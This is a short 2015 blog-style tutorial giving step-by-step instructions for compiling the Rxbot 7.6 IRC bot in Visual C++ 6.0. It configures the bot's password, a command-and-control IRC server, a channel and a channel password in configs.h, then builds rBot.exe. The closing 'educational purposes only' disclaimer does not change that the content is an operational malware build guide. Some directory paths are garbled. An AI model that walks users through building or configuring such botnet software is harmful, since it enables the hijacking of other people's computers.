Sunday, 13 September 2015




  1. Download and install Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
  2. Download and install the Service pack 6
  3. Download and install Windows SDK
  4. Open up Microsoft Visual C++ Compilier 6.0
  5. Go to Tools > Options and Click the Directories tab
  6. Now, browse to these directories and add them to the list: (Click the dotted box to add)

    C:PROGRAM FILESMICROSOFT PLATFORM SDK
    C:PROGRAM FILESMICROSOFT PLATFORM SDKBIN
    C:PROGRAM FILESMICROSOFT PLATFORM SDKINCLUDE
    C:PROGRAM FILESMICROSOFRT PLATFORM SDKLIB
  7. Make sure they're in the order above (use the arrows to adjust the order)
  8. Download Rxbot 7.6
  9. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

    Put in quotations:
    char password[] = Bot_login_pass; // bot password (Ex: monkey)
    char server[] = aenigma.gotd.org; // server (Ex: irc.efnet.net)
    char serverpass[] = ; // server password (not usually needed)
    char channel[] = #botz_channel; // channel that the bot should join
    char chanpass[] = My_channel_pass; // channel password

    Optional:
    char server2[] = ; // backup server
    char channel2[] = ; // backup channel
    char chanpass2[] = ; //Backup channel pass
  10. Make sure Microsoft Visual C++ is open
  11. Select File > Open Workspace
  12. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
  13. Right Click rBot Files and click Build:
  14. rBot.exe will be in the Rxbot 7.6 > Debug directory
  15. AND YOUR DONE
  16. NOTE:"THIS TUTORIAL IS FOR EDUCATIONAL PURPOSES ONLY"